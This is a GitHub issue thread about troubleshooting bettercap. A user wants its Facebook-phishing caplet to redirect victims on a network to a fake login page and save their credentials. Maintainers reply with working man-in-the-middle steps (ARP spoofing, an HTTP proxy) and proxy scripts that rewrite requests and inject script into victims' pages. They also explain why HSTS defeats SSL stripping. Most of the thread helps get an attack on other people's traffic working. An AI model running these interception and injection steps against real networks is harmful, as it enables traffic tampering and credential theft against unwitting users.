Closed. bruvv closed this issue 6 years ago.
You say

> When i run it no computer (http nor https) is being redirected to my http server.

But then you also say

> Then you get the error from google chrome (HSTS)

So are you sslstripping and then getting an HSTS warning? That would mean that traffic is redirected to your proxy server.
Are you able to sniff HTTP traffic? If not, maybe your router is too secure, in which case you can try spawning your own AP.
Thanks for the reply. I did run it with sslstrip at one point just to see if it is working. Then I get that error message. When I leave it off nothing gets redirected. I also tried playing around with dns.spoof, but that just gives DNS errors in Chrome and does not redirect to the webserver either.
If I enable net.sniff on, then yes, I can see data. So sniffing is working, it is just the redirect that is not working. And I am using a Pineapple Nano as a router.
hmmmm.. Are you sure nothing gets redirected? It sounds to me like things are being redirected but the HSTS rules of facebook are preventing you from manipulating those requests/responses.
Try a site without SSL.
Edit: I have a caplet in the works to bypass hsts rules which I will upload soon
Thanks for that yungtravla, I tested multiple sites, HTTP and HTTPS. Would you mind testing it yourself? It could be me that it is not working for.
@d1slact0r what did you try to do with the http traffic?
Please run the following test, and if that does not yield positive results then you should include some debug logs by issuing `bettercap -debug`.
Save the following file in your caplets folder as issue235.js:

```javascript
// Replace the body of every proxied HTTP response with a fixed string.
function onResponse(req, res) {
    res.ReadBody()          // read the original body before overwriting it
    res.Body = "payload"
}
```

Then fire up bettercap and test the proxy script by issuing:

```
set http.proxy.script caplets/issue235.js
arp.spoof on
http.proxy on
```

HTTP traffic should now be intercepted and manipulated.
Actually no I don't think that made any difference...
I am sorry for the late reply, I did not have the time to test this yet. Will try and see if it works for me to test it tomorrow! Just for my own knowledge: the JS scripts that get injected, do they only get injected into the server? Or are they being injected into a victim's browser?
@d1slact0r it is up to you where/what you inject.
I think you meant to ask if your payloads will be injected into request packets as well as response packets?
You can access all properties from both packets, like so:

Change HTTP request headers before proxying a response:

```javascript
function onRequest(req, res) {
    // overwrite a header on the outgoing request
    req.SetHeader("User-Agent", "bettercap")
}
```

Change HTTP request parameters before proxying a response:

```javascript
function onRequest(req, res) {
    if ( req.Host == "youtube.com" || req.Host == "www.youtube.com" ) {
        req.ReadBody()      // populate req.Body before editing it
        req.Body = req.Body.replace(/v=[a-z0-9]+/i, "v=0jGaio87u3A")
    }
}
```

Serve an HTTP response before proxying a response:

```javascript
function onRequest(req, res) {
    if ( req.Host == "192.168.1.4" ) {
        // setting a status here answers the client directly instead of forwarding
        res.Status = 403
        res.Body = "forbidden"
    }
}
```

Change HTTP response body after proxying a response:

```javascript
function onResponse(req, res) {
    if ( res.ContentType == "text/html" ) {
        res.ReadBody()      // populate res.Body before editing it
        res.Body = res.Body.replace(/<\/head>/i, "<script>alert('injected')</script></head>")
    }
}
```
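To see how the four hooks above fit together without running a proxy, here is an added stand-in for the http.proxy script pipeline (constructed for this thread, not bettercap's code). It assumes, from the "before/after proxying" headings only, that a non-zero `res.Status` set in `onRequest` makes the proxy answer directly, and that `.Body` is empty until `ReadBody()` is called; the upstream server and the hosts are constructed.

```javascript
// Mock request/response objects exposing the properties used by the hooks above.
function makeReq(host, rawBody) {
  return {
    Host: host, Headers: {}, Body: "", _raw: rawBody,
    ReadBody() { this.Body = this._raw; return this.Body; },
    SetHeader(k, v) { this.Headers[k] = v; },
  };
}
function makeRes(contentType, rawBody) {
  return {
    Status: 0, ContentType: contentType, Body: "", _raw: rawBody,
    ReadBody() { this.Body = this._raw; return this.Body; },
  };
}
// Constructed upstream: what the real server would have answered.
function upstream(req) {
  return makeRes("text/html", `<html><head></head><body>${req.Host}</body></html>`);
}
// Pipeline model (assumption): onRequest runs first; if it set a status the
// response is served as-is and never forwarded; otherwise the request is
// forwarded and onResponse gets to edit the upstream answer.
function proxy(script, req) {
  const early = makeRes("text/plain", "");
  if (script.onRequest) script.onRequest(req, early);
  if (early.Status !== 0) return { forwarded: false, res: early };
  const res = upstream(req);
  if (script.onResponse) script.onResponse(req, res);
  return { forwarded: true, res };
}
// The hooks from the examples above, merged into one script object.
const pageScript = {
  onRequest(req, res) {
    req.SetHeader("User-Agent", "bettercap");
    if (req.Host === "192.168.1.4") { res.Status = 403; res.Body = "forbidden"; }
  },
  onResponse(req, res) {
    if (res.ContentType === "text/html") {
      res.ReadBody();                       // without this, Body is still ""
      res.Body = res.Body.replace(/<\/head>/i, "<script>alert('injected')</script></head>");
    }
  },
};
// The omission pointed out later in the thread: editing Body without
// ReadBody() runs the regex over an empty string, so the client gets an empty page.
const noReadScript = {
  onResponse(req, res) { res.Body = res.Body.replace(/<\/head>/i, "<!-- x --></head>"); },
};
```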
@yungtravla should this issue be kept open or can I close?
I did not have the time to test it to confirm that it is working. So no, do not close it. @yungtravla what I meant to ask is where do the JS files get injected? Where is that JavaScript placed? On the server that bettercap creates, right?
@yungtravla I saved this:

```
set http.proxy.script caplets/issue235.js
arp.spoof on
http.proxy on
```

as a caplet and fired up bettercap with "sudo ./bettercap -caplet caplets/issue235.cap", and then in that issue235.js I've tried every JavaScript that you had asked to test and I couldn't get any result unfortunately :s The YouTube JavaScript you gave, I also tried, but YouTube should get downgraded to HTTP I think, because when I used that YouTube JavaScript I still stayed in HTTPS, and even in HTTPS I tried to load a video and I didn't get redirected. Regarding the other JavaScripts, I've tried them on HTTP websites but they still didn't work out :s Maybe the problem is mine; if I'm doing anything wrong please tell me.
PS: I tried it from my computer to my Android phone, which is Android 8.1 with Firefox on it.
This is basically a duplicate of #154.
Facebook domains are preloaded in HSTS, meaning you can't spoof them (via arp.spoof + dns.spoof, which I just tested for another domain on macOS and it works correctly, if used correctly). That is why the fb-phish caplet does not include any type of spoofing in it; it just offers a fake Facebook login and intercepts the credentials.
You should really stop closing issues so quickly without giving users the time to reply or asking them if it has been resolved... And this has nothing to do with the Facebook domain. If you read it you should see that this is an issue with redirecting the victim to the bettercap nginx server (HTTP server). This could be from any domain. Let's take www.randomwebsite.com: it should redirect the users to the bettercap HTTP server, and at this point that is not working.
> You should really stop closing issues so quickly without giving users the time to reply or asking them if it has been resolved...

It looks to me like you still had the chance to reply; moreover, managing this project, it's up to me to decide which issue to keep open, which to close and why ... remember this is free software and GitHub issues are not for customer support, they're a tool for us, the developers.
The real problem is not the issue being closed, but that I gave an explanation you don't like: the caplet you're using is not supposed to work as you want it to work because, as described in #154, that'd require a fully working sslstrip, which is not in the TODO given that HSTS made it nearly pointless in the most important cases years ago.
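The reason the downgrade fails, shown as an added example that is not from this thread or from bettercap: a minimal model of a browser's HSTS store. Header parsing follows RFC 6797 in simplified form; the preload list and the hosts are constructed for the example, not the real Chromium preload list.

```javascript
// Parse a Strict-Transport-Security header value. max-age is mandatory;
// a header without it is ignored, as the RFC requires.
function parseHSTS(header) {
  let maxAge = null, includeSubDomains = false;
  for (const part of header.split(";")) {
    const [name, value] = part.trim().split("=");
    const key = name.trim().toLowerCase();
    if (key === "max-age" && value !== undefined) {
      const n = parseInt(value.trim().replace(/"/g, ""), 10);
      if (!Number.isNaN(n) && n >= 0) maxAge = n;
    } else if (key === "includesubdomains") {
      includeSubDomains = true;
    }
  }
  return maxAge === null ? null : { maxAge, includeSubDomains };
}
class HSTSStore {
  // Preloaded hosts (constructed list) never expire and cover subdomains.
  constructor(preloaded = []) {
    this.entries = new Map();
    for (const h of preloaded) this.entries.set(h, { expires: Infinity, includeSubDomains: true });
  }
  // Record a policy from a response. The header is only honoured over https,
  // which is why a proxy sitting on plain http can neither plant nor clear one.
  observe(host, scheme, header, now) {
    if (scheme !== "https") return;
    const p = parseHSTS(header);
    if (!p) return;
    const cur = this.entries.get(host);
    if (cur && cur.expires === Infinity) return;   // preloaded entries are fixed
    if (p.maxAge === 0) { this.entries.delete(host); return; }
    this.entries.set(host, { expires: now + p.maxAge * 1000, includeSubDomains: p.includeSubDomains });
  }
  // Would the browser rewrite http://host to https:// before sending anything?
  // Walks the host and each parent domain, honouring includeSubDomains.
  mustUpgrade(host, now) {
    const labels = host.toLowerCase().split(".");
    for (let i = 0; i < labels.length; i++) {
      const e = this.entries.get(labels.slice(i).join("."));
      if (!e || e.expires <= now) continue;
      if (i === 0 || e.includeSubDomains) return true;
    }
    return false;
  }
}
```

A host that is neither preloaded nor previously visited over https is the only case where the http request ever leaves the browser, which is the case sslstrip-style downgrades depend on.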
@d1slact0r what does it matter whether this issue remains open or not? evilsocket is just trying to keep the issues page clean.
@madScript01 I believe the example issue235.js I gave was missing `res.ReadBody()` before `res.Body = "payload"`
I finally had some time off and successfully tested issue235.js. The site gets spoofed. I now finally understand the JS file part. Now my JavaScript sucks; I just do not have the knowledge to write a script that intercepts the victim browsing the web and redirects them to the bettercap server (this can be anything, I do not want people to re-login into Facebook, but I want them to be rickrolled or something).
@d1slact0r Well if you want to learn javascript then I suggest you "google" things step by step and mess around in your browser's console, you can learn tonnes of stuff that way.
I just saw the new update to the caplets, I think that is exactly what I was looking for and meant to ask in here :) will try this new injectjs caplet asap!
OMG people get supported even if the issue is closed!!! crazy isn't it?!!?!? :'D glad this has been solved one way or another, @yungtravla amazing work, you're definitely the caplets pro :D
<3
What I am trying at home is the fb-phishing caplet. When I run it no computer (HTTP nor HTTPS) is being redirected to my HTTP server. What I tried:
- DNS spoof: the victim just loses connection and says there is no internet connection.
- ARP spoof: nothing gets spoofed and the computer keeps its connection.
- HTTP(S) proxy with sslstrip: then you get the error from Google Chrome (HSTS).

Going from the victim IP to the webserver works, and when I try to log in it redirects to facebook.com/login.php, but the login details are not saved nor displayed, thus I assume that the JavaScript injection is not working.
Environment
Please provide:
- Bettercap version = latest
- Victim + host = macOS
- Command line arguments you are using = sudo ./bettercap -caplet caplets/fb-phish.cap
Steps to Reproduce
Expected behavior: the victim gets redirected to the fake FB site, fills in the username and password, and that gets saved (it does not save the login details!).
Actual behavior: the victim just goes straight on internetting without being forwarded.
ref: https://github.com/bettercap/caplets/issues/13